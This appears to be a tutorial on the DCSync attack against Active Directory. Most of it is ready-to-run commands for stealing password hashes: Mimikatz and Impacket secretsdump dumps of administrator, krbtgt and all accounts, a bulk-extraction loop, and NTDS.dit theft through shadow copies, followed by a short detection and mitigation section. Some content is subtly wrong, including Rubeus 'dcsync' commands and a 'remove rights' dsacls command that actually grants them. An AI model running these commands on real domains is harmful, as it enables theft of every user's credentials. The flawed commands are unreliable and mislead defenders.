DCSync Attack
Master domain replication attacks for credential extraction.
Objectives
- Understand Directory Replication Service (DRS) protocol
- Master DCSync attack methodology
- Learn credential extraction techniques
- Implement NTDS.dit database manipulation
What is DCSync?
DCSync is an attack technique that leverages the Directory Replication Service (DRS) protocol to request replication of password data from a Domain Controller, effectively allowing an attacker to extract password hashes for any user in the domain.
DCSync Attack Characteristics:
- Replication-based: Uses legitimate domain replication protocols
- Credential extraction: Can extract any user's password hash
- Domain-wide impact: Affects the entire domain
- Stealthy operation: Appears as normal replication traffic
Directory Replication Service (DRS) Protocol
The DRS protocol is used for replication between Domain Controllers in Active Directory environments.
DRS Protocol Overview
The DRS protocol operates over RPC and is used to:
- Synchronize directory data between Domain Controllers
- Replicate password changes and account updates
- Maintain consistency across the domain
- Support multi-DC environments
Key DRS Operations
| Operation | Purpose | Security Impact |
|---|---|---|
| IDL_DRSGetNCChanges | Retrieve directory changes | Can extract password data |
| IDL_DRSReplicaSync | Synchronize replica data | Access to full directory data |
| IDL_DRSGetReplInfo | Get replication information | Information disclosure |
Prerequisites for DCSync Attack
To perform a DCSync attack, an attacker needs specific permissions and access.
Required Permissions
The following permissions are required for DCSync attacks:
- Replicating Directory Changes: Permission to replicate directory changes
- Replicating Directory Changes All: Permission to replicate all directory changes including passwords
- Domain Controller Access: Network access to a Domain Controller
Accounts with DCSync Rights
By default, the following accounts have DCSync rights:
- Domain Controllers: All Domain Controllers in the domain
- Domain Admins: Members of the Domain Admins group
- Enterprise Admins: Members of the Enterprise Admins group
- Administrators: Local administrators on Domain Controllers
Checking DCSync Rights
# Using PowerView to check DCSync rights
Get-ObjectAcl -DistinguishedName "DC=corp,DC=local" -ResolveGUIDs | Where-Object {$_.ActiveDirectoryRights -like "*Replicating*"}
# Using PowerShell
Get-Acl "AD:\DC=corp,DC=local" | Select-Object -ExpandProperty Access | Where-Object {$_.ActiveDirectoryRights -like "*Replicating*"}
DCSync Attack Implementation
Method 1: Using Mimikatz
Mimikatz provides built-in DCSync functionality:
# Extract specific user password hash
mimikatz # lsadump::dcsync /domain:corp.local /user:administrator
# Extract all password hashes
mimikatz # lsadump::dcsync /domain:corp.local /all
# Extract KRBTGT account hash
mimikatz # lsadump::dcsync /domain:corp.local /user:krbtgt
# Extract from specific DC
mimikatz # lsadump::dcsync /domain:corp.local /user:administrator /dc:dc1.corp.local
Method 2: Using Impacket
Impacket provides Python-based DCSync capabilities:
# Extract all secrets using secretsdump
secretsdump.py -dc-ip 192.168.1.10 corp.local/compromised_user:password@192.168.1.10
# Extract specific user
secretsdump.py -dc-ip 192.168.1.10 -just-dc-user administrator corp.local/compromised_user:password@192.168.1.10
# Extract with different authentication methods
secretsdump.py -dc-ip 192.168.1.10 -hashes aad3b435b51404eeaad3b435b51404ee:1234567890abcdef1234567890abcdef corp.local/compromised_user@192.168.1.10
Method 3: Using Rubeus
Rubeus provides .NET-based DCSync functionality:
# Extract specific user using Rubeus
Rubeus.exe dcsync /user:administrator /domain:corp.local
# Extract KRBTGT hash
Rubeus.exe dcsync /user:krbtgt /domain:corp.local
# Extract with custom credentials
Rubeus.exe dcsync /user:administrator /domain:corp.local /creduser:compromised_user /credpassword:password
Advanced DCSync Techniques
1. Cross-Domain DCSync
Perform DCSync attacks across trusted domains:
# DCSync from trusted domain
mimikatz # lsadump::dcsync /domain:trusted.local /user:administrator /dc:trusted-dc.trusted.local
# Extract trust account hashes
mimikatz # lsadump::dcsync /domain:trusted.local /user:corp$
2. Selective Hash Extraction
Extract specific types of credentials:
# Extract only NTLM hashes
mimikatz # lsadump::dcsync /domain:corp.local /user:administrator /csv
# Extract Kerberos keys
mimikatz # lsadump::dcsync /domain:corp.local /user:administrator /kerberos
# Extract all credential types
mimikatz # lsadump::dcsync /domain:corp.local /user:administrator /all
3. Automated DCSync Scripts
Create automated DCSync extraction scripts:
# PowerShell script for automated DCSync
$domain = "corp.local"
$dc = "dc1.corp.local"
$users = @("administrator", "krbtgt", "service_account")
foreach ($user in $users) {
Write-Host "Extracting hash for $user"
mimikatz.exe "lsadump::dcsync /domain:$domain /user:$user /dc:$dc" "exit"
}
NTDS.dit Database Manipulation
Understanding the NTDS.dit database structure is crucial for advanced DCSync techniques.
NTDS.dit Structure
The NTDS.dit database contains several important tables:
- datatable: Main object storage
- link_table: Object relationships
- sd_table: Security descriptors
- msysobjects: Schema definitions
Direct NTDS.dit Access
Extract credentials directly from NTDS.dit:
# Create volume shadow copy
vssadmin create shadow /for=C:
# Copy NTDS.dit from shadow copy
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit
# Extract credentials using ntdsutil
ntdsutil "ac i ntds" "ifm" "create full C:\temp" q q
# Use secretsdump on extracted files
secretsdump.py -ntds C:\temp\Active\ Domain\ PDC\ _dc1.corp.local\ntds.dit -system C:\temp\Active\ Domain\ PDC\ _dc1.corp.local\SYSTEM local
DCSync Detection and Mitigation
Detection Methods
Detecting DCSync attacks requires monitoring specific events and network traffic.
Event Log Monitoring
# Monitor for replication events
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4662} | Where-Object {$_.Message -match "Replicating Directory Changes"}
# Monitor for unusual replication patterns
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4662} | Where-Object {$_.Message -match "DCSync"}
Network Monitoring
- RPC traffic: Monitor for unusual RPC connections to DCs
- Replication traffic: Look for replication requests from non-DC systems
- Volume patterns: Monitor for large data transfers
Mitigation Strategies
1. Remove DCSync Rights
# Remove DCSync rights from compromised accounts
dsacls "DC=corp,DC=local" /G "DOMAIN\compromised_account:CA;Replicating Directory Changes;user"
# Remove from service accounts
dsacls "DC=corp,DC=local" /G "DOMAIN\service_account:CA;Replicating Directory Changes;user"
2. Implement Monitoring
- SIEM integration: Set up alerts for DCSync events
- Network monitoring: Monitor RPC traffic to DCs
- Access reviews: Regular review of accounts with DCSync rights
3. Network Segmentation
- DC isolation: Restrict network access to Domain Controllers
- RPC filtering: Filter RPC traffic to DCs
- VPN requirements: Require VPN for DC access